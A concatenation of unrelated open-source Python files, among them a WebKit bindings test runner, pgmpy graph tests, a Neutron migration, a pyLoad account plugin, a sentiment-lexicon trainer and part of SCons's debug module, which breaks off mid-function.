# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import os.path
import shutil
import subprocess
import sys
import tempfile
from webkitpy.common.checkout.scm.detection import detect_scm_system
from webkitpy.common.system.executive import ScriptError
class BindingsTests:
def __init__(self, reset_results, generators, executive):
self.reset_results = reset_results
self.generators = generators
self.executive = executive
def generate_from_idl(self, generator, idl_file, output_directory, supplemental_dependency_file):
cmd = ['perl', '-w',
'-IWebCore/bindings/scripts',
'WebCore/bindings/scripts/generate-bindings.pl',
# idl include directories (path relative to generate-bindings.pl)
'--include', '.',
'--defines', 'TESTING_%s' % generator,
'--generator', generator,
'--outputDir', output_directory,
'--supplementalDependencyFile', supplemental_dependency_file,
idl_file]
exit_code = 0
try:
output = self.executive.run_command(cmd)
if output:
print output
except ScriptError, e:
print e.output
exit_code = e.exit_code
return exit_code
def generate_supplemental_dependency(self, input_directory, supplemental_dependency_file, window_constructors_file, workerglobalscope_constructors_file, sharedworkerglobalscope_constructors_file, dedicatedworkerglobalscope_constructors_file):
idl_files_list = tempfile.mkstemp()
for input_file in os.listdir(input_directory):
(name, extension) = os.path.splitext(input_file)
if extension != '.idl':
continue
os.write(idl_files_list[0], os.path.join(input_directory, input_file) + "\n")
os.close(idl_files_list[0])
cmd = ['perl', '-w',
'-IWebCore/bindings/scripts',
'WebCore/bindings/scripts/preprocess-idls.pl',
'--idlFilesList', idl_files_list[1],
'--defines', '',
'--supplementalDependencyFile', supplemental_dependency_file,
'--windowConstructorsFile', window_constructors_file,
'--workerGlobalScopeConstructorsFile', workerglobalscope_constructors_file,
'--sharedWorkerGlobalScopeConstructorsFile', sharedworkerglobalscope_constructors_file,
'--dedicatedWorkerGlobalScopeConstructorsFile', dedicatedworkerglobalscope_constructors_file]
exit_code = 0
try:
output = self.executive.run_command(cmd)
if output:
print output
except ScriptError, e:
print e.output
exit_code = e.exit_code
os.remove(idl_files_list[1])
return exit_code
def detect_changes(self, generator, work_directory, reference_directory):
changes_found = False
for output_file in os.listdir(work_directory):
cmd = ['diff',
'-u',
'-N',
os.path.join(reference_directory, output_file),
os.path.join(work_directory, output_file)]
exit_code = 0
try:
output = self.executive.run_command(cmd)
except ScriptError, e:
output = e.output
exit_code = e.exit_code
if exit_code or output:
print 'FAIL: (%s) %s' % (generator, output_file)
print output
changes_found = True
else:
print 'PASS: (%s) %s' % (generator, output_file)
return changes_found
def run_tests(self, generator, input_directory, reference_directory, supplemental_dependency_file):
work_directory = reference_directory
passed = True
for input_file in os.listdir(input_directory):
(name, extension) = os.path.splitext(input_file)
if extension != '.idl':
continue
# Generate output into the work directory (either the given one or a
# temp one if not reset_results is performed)
if not self.reset_results:
work_directory = tempfile.mkdtemp()
if self.generate_from_idl(generator,
os.path.join(input_directory, input_file),
work_directory,
supplemental_dependency_file):
passed = False
if self.reset_results:
print "Reset results: (%s) %s" % (generator, input_file)
continue
# Detect changes
if self.detect_changes(generator, work_directory, reference_directory):
passed = False
shutil.rmtree(work_directory)
return passed
def main(self):
current_scm = detect_scm_system(os.curdir)
os.chdir(os.path.join(current_scm.checkout_root, 'Source'))
all_tests_passed = True
input_directory = os.path.join('WebCore', 'bindings', 'scripts', 'test')
supplemental_dependency_file = tempfile.mkstemp()[1]
window_constructors_file = tempfile.mkstemp()[1]
workerglobalscope_constructors_file = tempfile.mkstemp()[1]
sharedworkerglobalscope_constructors_file = tempfile.mkstemp()[1]
dedicatedworkerglobalscope_constructors_file = tempfile.mkstemp()[1]
if self.generate_supplemental_dependency(input_directory, supplemental_dependency_file, window_constructors_file, workerglobalscope_constructors_file, sharedworkerglobalscope_constructors_file, dedicatedworkerglobalscope_constructors_file):
print 'Failed to generate a supplemental dependency file.'
os.remove(supplemental_dependency_file)
os.remove(window_constructors_file)
os.remove(workerglobalscope_constructors_file)
os.remove(sharedworkerglobalscope_constructors_file)
os.remove(dedicatedworkerglobalscope_constructors_file)
return -1
for generator in self.generators:
input_directory = os.path.join('WebCore', 'bindings', 'scripts', 'test')
reference_directory = os.path.join('WebCore', 'bindings', 'scripts', 'test', generator)
if not self.run_tests(generator, input_directory, reference_directory, supplemental_dependency_file):
all_tests_passed = False
os.remove(supplemental_dependency_file)
os.remove(window_constructors_file)
os.remove(workerglobalscope_constructors_file)
os.remove(sharedworkerglobalscope_constructors_file)
os.remove(dedicatedworkerglobalscope_constructors_file)
print ''
if all_tests_passed:
print 'All tests PASS!'
return 0
else:
print 'Some tests FAIL! (To update the reference files, execute "run-bindings-tests --reset-results")'
return -1
|
kris-singh/pgmpy | refs/heads/dev | pgmpy/tests/test_base/test_UndirectedGraph.py | 4 | #!/usr/bin/env python3
from pgmpy.base import UndirectedGraph
from pgmpy.tests import help_functions as hf
import unittest
class TestUndirectedGraphCreation(unittest.TestCase):
def setUp(self):
self.graph = UndirectedGraph()
def test_class_init_without_data(self):
self.assertIsInstance(self.graph, UndirectedGraph)
def test_class_init_with_data_string(self):
self.G = UndirectedGraph([('a', 'b'), ('b', 'c')])
self.assertListEqual(sorted(self.G.nodes()), ['a', 'b', 'c'])
self.assertListEqual(hf.recursive_sorted(self.G.edges()),
[['a', 'b'], ['b', 'c']])
def test_add_node_string(self):
self.graph.add_node('a')
self.assertListEqual(self.graph.nodes(), ['a'])
def test_add_node_nonstring(self):
self.graph.add_node(1)
self.assertListEqual(self.graph.nodes(), [1])
def test_add_nodes_from_string(self):
self.graph.add_nodes_from(['a', 'b', 'c', 'd'])
self.assertListEqual(sorted(self.graph.nodes()),
['a', 'b', 'c', 'd'])
def test_add_node_with_weight(self):
self.graph.add_node('a')
self.graph.add_node('weight_a', weight=0.3)
self.assertEqual(self.graph.node['weight_a']['weight'], 0.3)
self.assertEqual(self.graph.node['a']['weight'], None)
def test_add_nodes_from_with_weight(self):
self.graph.add_node(1)
self.graph.add_nodes_from(['weight_b', 'weight_c'], weights=[0.3, 0.5])
self.assertEqual(self.graph.node['weight_b']['weight'], 0.3)
self.assertEqual(self.graph.node['weight_c']['weight'], 0.5)
self.assertEqual(self.graph.node[1]['weight'], None)
def test_add_nodes_from_non_string(self):
self.graph.add_nodes_from([1, 2, 3, 4])
def test_add_edge_string(self):
self.graph.add_edge('d', 'e')
self.assertListEqual(sorted(self.graph.nodes()), ['d', 'e'])
self.assertListEqual(hf.recursive_sorted(self.graph.edges()),
[['d', 'e']])
self.graph.add_nodes_from(['a', 'b', 'c'])
self.graph.add_edge('a', 'b')
self.assertListEqual(hf.recursive_sorted(self.graph.edges()),
[['a', 'b'], ['d', 'e']])
def test_add_edge_nonstring(self):
self.graph.add_edge(1, 2)
def test_add_edges_from_string(self):
self.graph.add_edges_from([('a', 'b'), ('b', 'c')])
self.assertListEqual(sorted(self.graph.nodes()), ['a', 'b', 'c'])
self.assertListEqual(hf.recursive_sorted(self.graph.edges()),
[['a', 'b'], ['b', 'c']])
self.graph.add_nodes_from(['d', 'e', 'f'])
self.graph.add_edges_from([('d', 'e'), ('e', 'f')])
self.assertListEqual(sorted(self.graph.nodes()),
['a', 'b', 'c', 'd', 'e', 'f'])
self.assertListEqual(hf.recursive_sorted(self.graph.edges()),
hf.recursive_sorted([('a', 'b'), ('b', 'c'),
('d', 'e'), ('e', 'f')]))
def test_add_edges_from_nonstring(self):
self.graph.add_edges_from([(1, 2), (2, 3)])
def test_number_of_neighbors(self):
self.graph.add_edges_from([('a', 'b'), ('b', 'c')])
self.assertEqual(len(self.graph.neighbors('b')), 2)
def tearDown(self):
del self.graph
class TestUndirectedGraphMethods(unittest.TestCase):
def test_is_clique(self):
G = UndirectedGraph([('A', 'B'), ('C', 'B'), ('B', 'D'),
('B', 'E'), ('D', 'E'), ('E', 'F'),
('D', 'F'), ('B', 'F')])
self.assertFalse(G.is_clique(nodes=['A', 'B', 'C', 'D']))
self.assertTrue(G.is_clique(nodes=['B', 'D', 'E', 'F']))
self.assertTrue(G.is_clique(nodes=['D', 'E', 'B']))
def test_is_triangulated(self):
G = UndirectedGraph([('A', 'B'), ('A', 'C'),
('B', 'D'), ('C', 'D')])
self.assertFalse(G.is_triangulated())
G.add_edge('A', 'D')
self.assertTrue(G.is_triangulated())
|
AikawaKai/ExamCollision | refs/heads/master | corsi.py | 1 | import csv
import sys
import copy
import itertools
print("Benvenuto.\nQuesto programma in python ti permette di verificare se gli esami scelti nel tuo piano sono compatibili (no collision).\n\n")
input("Press Enter to continue...")
with open('csvnumesami.csv') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
print(row['num'], " ", row['esame'])
stringanum = input("Seleziona gli esami che ti interessa seguire questo semestre (Selezionali i numeri degli esami, separati da spazi, per ordine di priorità, in quanto il software controlla le collisioni nell'ordine di inserimento.): \n")
nums = [int(n) for n in stringanum.split()]
#print(nums)
print("Ecco gli esami selezionati:\n")
with open('csvnumesami.csv') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
if int(row['num']) in nums:
print(row['num'], " ", row['esame'])
arrayCollision = [
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
]
mylist = []
basic = []
for n in nums:
with open('csvcorsiNum.csv') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
if int(row['esame']) == n:
basic.append([row['esame'],row['day'],row['hoursStart'],row['hoursEnd']])
mylist.append(basic)
basic=[]
"""
permutazioni dell'ordine dell'esame. Potrebbe essere utile nella generazione della soluzione con il maggior numero di esami senza collisioni
print(list(itertools.permutations(mylist)))
"""
print(mylist)
listScartati=[]
flag=True
for esamDatas in mylist:
backUp = copy.deepcopy(arrayCollision)
for esamData in esamDatas:
for j in range(int(esamData[2]), int(esamData[3])+1):
#print ("Esame", esamData[0], "Giorno",esamData[1], " ","StartHour", j,"EndH ",esamData[3], arrayCollision[j][int(esamData[1])])
if arrayCollision[j][int(esamData[1])] == 1:
#print ("\nOPS OPS \nEsame", esamData[0], "Giorno",esamData[1], " ","StartHour", j,"EndH ",esamData[3], arrayCollision[j][int(esamData[1])])
flag=False
#print(flag,"\n")
break
if flag==True:
for j in range(int(esamData[2]), int(esamData[3])+1):
#print ("Sto inserendo...Esame", esamData[0], "Giorno",esamData[1], " ","StartHour", j,"EndH ",esamData[3], arrayCollision[j][int(esamData[1])])
arrayCollision[j][int(esamData[1])] = 1
else:
listScartati.append(esamData[0])
#print(backUp)
arrayCollision=copy.deepcopy(backUp)
flag=True
break
flag=True
for array in arrayCollision:
print(array)
print(listScartati)
for n in listScartati:
nums.remove(int(n))
print("\n\nEcco gli esami che puoi sostenere senza collisioni:\n")
with open('csvnumesami.csv') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
if int(row['num']) in nums:
print(row['num'], " ", row['esame'])
|
rdo-management/neutron | refs/heads/mgt-master | neutron/db/migration/alembic_migrations/versions/abc88c33f74f_lb_stats_needs_bigint.py | 17 | # Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""lb stats
Revision ID: abc88c33f74f
Revises: 3d2585038b95
Create Date: 2014-02-24 20:14:59.577972
"""
# revision identifiers, used by Alembic.
revision = 'abc88c33f74f'
down_revision = '3d2585038b95'
from alembic import op
import sqlalchemy as sa
from neutron.db import migration
def upgrade():
if migration.schema_has_table('poolstatisticss'):
op.alter_column('poolstatisticss', 'bytes_in',
type_=sa.BigInteger(), existing_type=sa.Integer())
op.alter_column('poolstatisticss', 'bytes_out',
type_=sa.BigInteger(), existing_type=sa.Integer())
op.alter_column('poolstatisticss', 'active_connections',
type_=sa.BigInteger(), existing_type=sa.Integer())
op.alter_column('poolstatisticss', 'total_connections',
type_=sa.BigInteger(), existing_type=sa.Integer())
def downgrade():
pass
|
pattisdr/osf.io | refs/heads/develop | addons/osfstorage/admin.py | 13 | from django.contrib import admin
from .models import Region
class RegionAdmin(admin.ModelAdmin):
list_display = ['name', '_id', 'waterbutler_url', 'mfr_url']
admin.site.register(Region, RegionAdmin)
|
michaelgallacher/intellij-community | refs/heads/master | python/testData/stubs/DynamicDunderAll.py | 83 | __all__ = ['foo', 'bar']
for i in range(5):
__all__.append('f' + str(i))
|
alazaro/tennis_tournament | refs/heads/master | django/dispatch/__init__.py | 571 | """Multi-consumer multi-producer dispatching mechanism
Originally based on pydispatch (BSD) http://pypi.python.org/pypi/PyDispatcher/2.0.1
See license.txt for original license.
Heavily modified for Django's purposes.
"""
from django.dispatch.dispatcher import Signal, receiver |
tod31/pyload | refs/heads/stable | module/plugins/accounts/BitshareCom.py | 3 | # -*- coding: utf-8 -*-
from module.plugins.internal.Account import Account
class BitshareCom(Account):
__name__ = "BitshareCom"
__type__ = "account"
__version__ = "0.19"
__status__ = "testing"
__description__ = """Bitshare account plugin"""
__license__ = "GPLv3"
__authors__ = [("Paul King", None)]
def grab_info(self, user, password, data):
html = self.load("http://bitshare.com/mysettings.html")
if "\"http://bitshare.com/myupgrade.html\">Free" in html:
return {'validuntil': -1, 'trafficleft': -1, 'premium': False}
if not '<input type="checkbox" name="directdownload" checked="checked" />' in html:
self.log_warning(_("Activate direct Download in your Bitshare Account"))
return {'validuntil': -1, 'trafficleft': -1, 'premium': True}
def signin(self, user, password, data):
html = self.load("https://bitshare.com/login.html",
post={'user' : user,
'password': password,
'submit' : "Login"})
if "login" in self.req.lastEffectiveURL:
self.fail_login()
|
girishramnani/pyappbase | refs/heads/master | tests/test_async.py | 1 | import asyncio
import time
import unittest
from test_sync import setup
from pyappbase import Appbase
async def hello_world(d, data):
while d[0]:
await asyncio.sleep(0.1)
data.append("Hello")
class AsnycTests(unittest.TestCase):
def setUp(self):
self.data = {
"type": "Books",
"id": "X2",
}
self.appbase = setup(Appbase)
self.appbase._set_async()
self.sync_appbase = setup(Appbase)
print(self.sync_appbase.index({
"type": "Books",
"id": "X2",
"body": {
"department_id": 1,
"department_name": "Books",
"name": "A Fake Book on Network Routing",
"price": 5295
}
}))
def test_async_sync_ping_comparison(self):
"""
This test runs the sync and async methods 'call_counts' times and checks if the async is faster than
sync or not
:return:
"""
# number of simultaneous calls
call_counts = 4
t = time.time()
for i in range(call_counts):
print(self.sync_appbase.ping())
sync_difference = time.time() - t
print()
print("Syncronous method took ", sync_difference, "s")
async def get_data():
return await self.appbase.ping()
t = time.time()
loop = asyncio.get_event_loop()
async def get_data_gathered():
answer = await asyncio.gather(*[get_data() for _ in range(call_counts)], loop=loop)
return answer
print("".join(loop.run_until_complete(get_data_gathered())))
async_difference = time.time() - t
print("Asnycronous method took ", async_difference, "s")
print()
# the async is more fast
self.assertGreater(sync_difference, async_difference)
def test_async_two_methods(self):
"""
simple asynchronously running ping with an async hello_world coroutine
:return:
"""
# some thing multable
wait = [True]
data = []
asyncio.get_event_loop().create_task(hello_world(wait, data))
results = asyncio.get_event_loop().run_until_complete(self.appbase.ping())
wait[0] = False
async def temp():
await asyncio.sleep(1)
asyncio.get_event_loop().run_until_complete(temp())
print(results)
self.assertNotEquals(len(data), 0)
def test_async_get(self):
async def get_data():
return await self.appbase.get(self.data)
results = asyncio.get_event_loop().run_until_complete(get_data())
self.assertEqual(results["_source"]["name"], "A Fake Book on Network Routing")
def test_async_index(self):
async def index_data():
return await self.appbase.index({
"type": "Books",
"id": "X2",
"body": {
"department_id": 1,
"department_name": "Books",
"name": "A Fake Book on Distributed Compute",
"price": 5295
}
})
async def get_data():
return await self.appbase.get(self.data)
index = asyncio.get_event_loop().run_until_complete(index_data())
result = asyncio.get_event_loop().run_until_complete(get_data())
self.assertEqual(result["_source"]["name"], "A Fake Book on Distributed Compute")
|
waytai/odoo | refs/heads/8.0 | addons/base_import_module/__init__.py | 3964 | import controllers
import models
|
Parsely/python-bloomfilter | refs/heads/master | pybloom/__init__.py | 1 | """pybloom
"""
from pybloom import BloomFilter, ScalableBloomFilter, __version__, __author__
from cdbf import CountdownBloomFilter, ScalableCountdownBloomFilter
from hashfilter import HashFilter
|
WladimirSidorenko/SentiLex | refs/heads/master | scripts/vo.py | 1 | #!/usr/bin/env python2.7
# -*- mode: python; coding: utf-8; -*-
"""Module for generating lexicon using Velikovich's method (2010).
"""
##################################################################
# Imports
from __future__ import unicode_literals, print_function
from collections import Counter
from copy import deepcopy
from datetime import datetime
from itertools import chain
from theano import tensor as TT
from sklearn.model_selection import train_test_split
import codecs
import numpy as np
import sys
import theano
from common import BTCH_SIZE, ENCODING, EPSILON, ESC_CHAR, FMAX, FMIN, \
INFORMATIVE_TAGS, MIN_TOK_CNT, \
NEGATIVE_IDX, NEUTRAL_IDX, POSITIVE_IDX, NONMATCH_RE, SENT_END_RE, \
TAB_RE, check_word, floatX, sgd_updates_adadelta
from common import POSITIVE as POSITIVE_LBL
from common import NEGATIVE as NEGATIVE_LBL
from germanet import normalize
##################################################################
# Constants
DFLT_T = 20
FASTMODE = False
MAX_NGHBRS = 25
TOK_WINDOW = 4 # it actually corresponds to a window of six
MAX_POS_IDS = 10000
MAX_EPOCHS = 5
MIN_EPOCHS = 3
UNK = "%unk%"
UNK_I = 0
##################################################################
# Methods
def _read_files_helper(a_crp_files, a_encoding=ENCODING):
"""Read corpus files and execute specified function.
@param a_crp_files - files of the original corpus
@param a_encoding - encoding of the vector file
@return (Iterator over file lines)
"""
i = 0
tokens_seen = False
for ifname in a_crp_files:
with codecs.open(ifname, 'r', a_encoding) as ifile:
for iline in ifile:
iline = iline.strip().lower()
if not iline or SENT_END_RE.match(iline):
continue
elif iline[0] == ESC_CHAR:
if FASTMODE:
i += 1
if i > 300:
break
if tokens_seen:
tokens_seen = False
yield None, None, None
continue
try:
iform, itag, ilemma = TAB_RE.split(iline)
except:
print("Invalid line format at line: {:s}".format(
repr(iline)), file=sys.stderr
)
continue
tokens_seen = True
yield iform, itag, normalize(ilemma)
yield None, None, None
def _read_files(a_crp_files, a_pos, a_neg, a_neut,
a_pos_re=NONMATCH_RE, a_neg_re=NONMATCH_RE,
a_encoding=ENCODING):
"""Read corpus files and populate one-directional co-occurrences.
@param a_crp_files - files of the original corpus
@param a_pos - initial set of positive terms
@param a_neg - initial set of negative terms
@param a_neut - initial set of neutral terms
@param a_pos_re - regular expression for matching positive terms
@param a_neg_re - regular expression for matching negative terms
@param a_encoding - encoding of the vector file
@return (word2vecid, x, y)
@note constructs statistics in place
"""
print("Populating corpus statistics...",
end="", file=sys.stderr)
word2cnt = Counter(ilemma
for _, itag, ilemma in _read_files_helper(a_crp_files,
a_encoding)
if ilemma is not None and itag[:2] in INFORMATIVE_TAGS
and check_word(ilemma))
print(" done", file=sys.stderr)
word2vecid = {UNK: UNK_I}
for w in chain(a_pos, a_neg, a_neut):
word2vecid[w] = len(word2vecid)
# convert words to vector ids if their counters are big enough
for w, cnt in word2cnt.iteritems():
if cnt >= MIN_TOK_CNT or a_pos_re.search(w) or a_neg_re.search(w):
word2vecid[w] = len(word2vecid)
word2cnt.clear()
# generate the training set
def check_in_seeds(a_form, a_lemma, a_seeds, a_seed_re):
if a_seed_re.search(a_form) or a_seed_re.search(a_lemma) \
or a_form in a_seeds or normalize(a_form) in a_seeds \
or a_lemma in a_seeds:
return True
return False
max_sent_len = 0
X = []
Y = []
toks = []
label = None
for iform, itag, ilemma in _read_files_helper(a_crp_files):
if ilemma is None:
if toks:
if label is not None:
max_sent_len = max(max_sent_len, len(toks))
X.append(deepcopy(toks))
Y.append(label)
del toks[:]
label = None
continue
if ilemma in word2vecid:
toks.append(word2vecid[ilemma])
if check_in_seeds(iform, ilemma, a_pos, a_pos_re):
label = POSITIVE_IDX
elif check_in_seeds(iform, ilemma, a_neg, a_neg_re):
label = NEGATIVE_IDX
elif label is None and check_in_seeds(iform, ilemma,
a_neut, NONMATCH_RE):
label = NEUTRAL_IDX
X = np.array(
[x + [UNK_I] * (max_sent_len - len(x))
for x in X], dtype="int32")
Y = np.array(Y, dtype="int32")
return (word2vecid, max_sent_len, X, Y)
def init_embeddings(vocab_size, k=3):
"""Uniformly initialze lexicon scores for each vocabulary word.
Args:
vocab_size (int): vocabulary size
k (int): dimensionality of embeddings
Returns:
2-tuple(theano.shared, int): embedding matrix, vector dimmensionality
"""
rand_vec = np.random.uniform(-0.25, 0.25, k)
W = floatX(np.broadcast_to(rand_vec,
(vocab_size, k)))
# zero-out the vector of unknown terms
W[UNK_I] *= 0.
return theano.shared(value=W, name='W'), k
def init_nnet(W, k):
"""Initialize neural network.
Args:
W (theano.shared): embedding matrix
k: dimensionality of the vector
"""
# `x' will be a matrix of size `m x n', where `m' is the mini-batch size
# and `n' is the maximum observed sentence length times the dimensionality
# of embeddings (`k')
x = TT.imatrix(name='x')
# `y' will be a vectors of size `m', where `m' is the mini-batch size
y = TT.ivector(name='y')
# `emb_sum' will be a matrix of size `m x k', where `m' is the mini-batch
# size and `k' is dimensionality of embeddings
emb_sum = W[x].sum(axis=1)
# it actually does not make sense to have an identity matrix in the
# network, but that's what the original Vo implemenation actually does
# W2S = theano.shared(value=floatX(np.eye(3)), name="W2S")
# y_prob = TT.nnet.softmax(TT.dot(W2S, emb_sum.T))
y_prob = TT.nnet.softmax(emb_sum)
y_pred = TT.argmax(y_prob, axis=1)
params = [W]
cost = -TT.mean(TT.log(y_prob)[TT.arange(y.shape[0]), y])
updates = sgd_updates_adadelta(params, cost)
train = theano.function([x, y], cost, updates=updates)
acc = TT.sum(TT.eq(y, y_pred))
validate = theano.function([x, y], acc)
zero_vec = TT.basic.zeros(k)
zero_out = theano.function([],
updates=[(W,
TT.set_subtensor(W[UNK_I, :],
zero_vec))])
return (train, validate, zero_out, params)
def vo(a_N, a_crp_files, a_pos, a_neg, a_neut,
a_pos_re=NONMATCH_RE, a_neg_re=NONMATCH_RE, a_encoding=ENCODING):
"""Method for generating sentiment lexicons using Velikovich's approach.
@param a_N - number of terms to extract
@param a_crp_files - files of the original corpus
@param a_pos - initial set of positive terms to be expanded
@param a_neg - initial set of negative terms to be expanded
@param a_neut - initial set of neutral terms to be expanded
@param a_pos_re - regular expression for matching positive terms
@param a_neg_re - regular expression for matching negative terms
@param a_encoding - encoding of the vector file
@return list of terms sorted according to their polarities
"""
# digitize training set
word2vecid, max_sent_len, X, Y = _read_files(
a_crp_files, a_pos, a_neg, a_neut, a_pos_re, a_neg_re,
a_encoding
)
# initianlize neural net and embedding matrix
W, k = init_embeddings(len(word2vecid))
train, validate, zero_out, params = init_nnet(W, k)
# organize minibatches and run the training
N = len(Y)
assert N, "Training set is empty."
train_idcs, devtest_idcs = train_test_split(
np.arange(N), test_size=0.1)
train_N = len(train_idcs)
devtest_N = float(len(devtest_idcs))
devtest_x = X[devtest_idcs[:]]
devtest_y = Y[devtest_idcs[:]]
btch_size = min(N, BTCH_SIZE)
epoch_i = 0
acc = 0
best_acc = -1
prev_acc = FMIN
best_params = []
while epoch_i < MAX_EPOCHS:
np.random.shuffle(train_idcs)
cost = acc = 0.
start_time = datetime.utcnow()
for start in np.arange(0, train_N, btch_size):
end = min(train_N, start + btch_size)
btch_x = X[train_idcs[start:end]]
btch_y = Y[train_idcs[start:end]]
cost += train(btch_x, btch_y)
zero_out()
acc = validate(devtest_x, devtest_y) / devtest_N
if acc >= best_acc:
best_params = [p.get_value() for p in params]
best_acc = acc
sfx = " *"
else:
sfx = ''
end_time = datetime.utcnow()
tdelta = (end_time - start_time).total_seconds()
print("Iteration #{:d} ({:.2f} sec): cost = {:.2f}, "
"accuracy = {:.2%};{:s}".format(epoch_i, tdelta, cost,
acc, sfx),
file=sys.stderr)
if abs(prev_acc - acc) < EPSILON and epoch_i > MIN_EPOCHS:
break
else:
prev_acc = acc
epoch_i += 1
if best_params:
for p, val in zip(params, best_params):
p.set_value(val)
W = W.get_value()
ret = []
for w, w_id in word2vecid.iteritems():
if w_id == UNK_I:
continue
elif w in a_pos or a_pos_re.search(w):
w_score = FMAX
elif w in a_neg or a_neg_re.search(w):
w_score = FMIN
else:
w_pol = np.argmax(W[w_id])
if w_pol == NEUTRAL_IDX:
continue
w_score = np.max(W[w_id])
if (w_pol == POSITIVE_IDX and w_score < 0.) \
or (w_pol == NEGATIVE_IDX and w_score > 0.):
w_score *= -1
ret.append((w,
POSITIVE_LBL if w_score > 0. else NEGATIVE_LBL,
w_score))
ret.sort(key=lambda el: abs(el[-1]), reverse=True)
if a_N >= 0:
del ret[a_N:]
return ret
|
angad/libjingle-mac | refs/heads/master | scons-2.2.0/engine/SCons/Debug.py | 14 | """SCons.Debug
Code for debugging SCons internal things. Shouldn't be
needed by most users.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Debug.py issue-2856:2676:d23b7a2f45e8 2012/08/05 15:38:28 garyo"
import os
import sys
import time
import weakref
tracked_classes = {}
def logInstanceCreation(instance, name=None):
if name is None:
name = instance.__class__.__name__
if name not in tracked_classes:
tracked_classes[name] = []
tracked_classes[name].append(weakref.ref(instance))
def string_to_classes(s):
if s == '*':
return sorted(tracked_classes.keys())
else:
return s.split()
def fetchLoggedInstances(classes="*"):
classnames = string_to_classes(classes)
return [(cn, len(tracked_classes[cn])) for cn in classnames]
def countLoggedInstances(classes, file=sys.stdout):
for classname in string_to_classes(classes):
file.write("%s: %d\n" % (classname, len(tracked_classes[classname])))
def listLoggedInstances(classes, file=sys.stdout):
for classname in string_to_classes(classes):
file.write('\n%s:\n' % classname)
for ref in tracked_classes[classname]:
obj = ref()
if obj is not None:
file.write(' %s\n' % repr(obj))
def dumpLoggedInstances(classes, file=sys.stdout):
for classname in string_to_classes(classes):
file.write('\n%s:\n' % classname)
for ref in tracked_classes[classname]:
obj = ref()
if obj is not None:
file.write(' %s:\n' % obj)
for key, value in obj.__dict__.items():
file.write(' %20s : %s\n' % (key, value))
if sys.platform[:5] == "linux":
# Linux doesn't actually support memory usage stats from getrusage().
def memory():
mstr = open('/proc/self/stat').read()
mstr = mstr.split()[22]
return int(mstr)
elif sys.platform[:6] == 'darwin':
#TODO really get memory stats for OS X
def memory():
return 0
else:
try:
import resource
except ImportError:
try:
import win32process
import win32api
except ImportError:
def memory():
return 0
else:
def memory():
process_handle = win32api.GetCurrentProcess()
memory_info = win32process.GetProcessMemoryInfo( process_handle )
return memory_info['PeakWorkingSetSize']
else:
def memory():
res = resource.getrusage(resource.RUSAGE_SELF)
return res[4]
# returns caller's stack
def caller_stack(*backlist):
import traceback
if not backlist:
backlist = [0]
result = []
for back in backlist:
tb = traceback.extract_stack(limit=3+back)
key = tb[0][:3]
result.append('%s:%d(%s)' % func_shorten(key))
return result
caller_bases = {}
caller_dicts = {}
# trace a caller's stack
def caller_trace(back=0):
import traceback
tb = traceback.extract_stack(limit=3+back)
tb.reverse()
callee = tb[1][:3]
caller_bases[callee] = caller_bases.get(callee, 0) + 1
for caller in tb[2:]:
caller = callee + caller[:3]
try:
entry = caller_dicts[callee]
except KeyError:
caller_dicts[callee] = entry = {}
entry[caller] = entry.get(caller, 0) + 1
callee = caller
# print a single caller and its callers, if any
def _dump_one_caller(key, file, level=0):
leader = ' '*level
for v,c in sorted([(-v,c) for c,v in caller_dicts[key].items()]):
file.write("%s %6d %s:%d(%s)\n" % ((leader,-v) + func_shorten(c[-3:])))
if c in caller_dicts:
_dump_one_caller(c, file, level+1)
# print each call tree
def dump_caller_counts(file=sys.stdout):
for k in sorted(caller_bases.keys()):
file.write("Callers of %s:%d(%s), %d calls:\n"
% (func_shorten(k) + (caller_bases[k],)))
_dump_one_caller(k, file)
shorten_list = [
( '/scons/SCons/', 1),
( '/src/engine/SCons/', 1),
( '/usr/lib/python', 0),
]
if os.sep != '/':
shorten_list = [(t[0].replace('/', os.sep), t[1]) for t in shorten_list]
def func_shorten(func_tuple):
f = func_tuple[0]
for t in shorten_list:
i = f.find(t[0])
if i >= 0:
if t[1]:
i = i + len(t[0])
return (f[i:],)+func_tuple[1:]
return func_tuple
TraceFP = {}
if sys.platform == 'win32':
TraceDefault = 'con'
else:
TraceDefault = '/dev/tty'
TimeStampDefault = None
StartTime = time.time()
PreviousTime = StartTime
def Trace(msg, file=None, mode='w', tstamp=None):
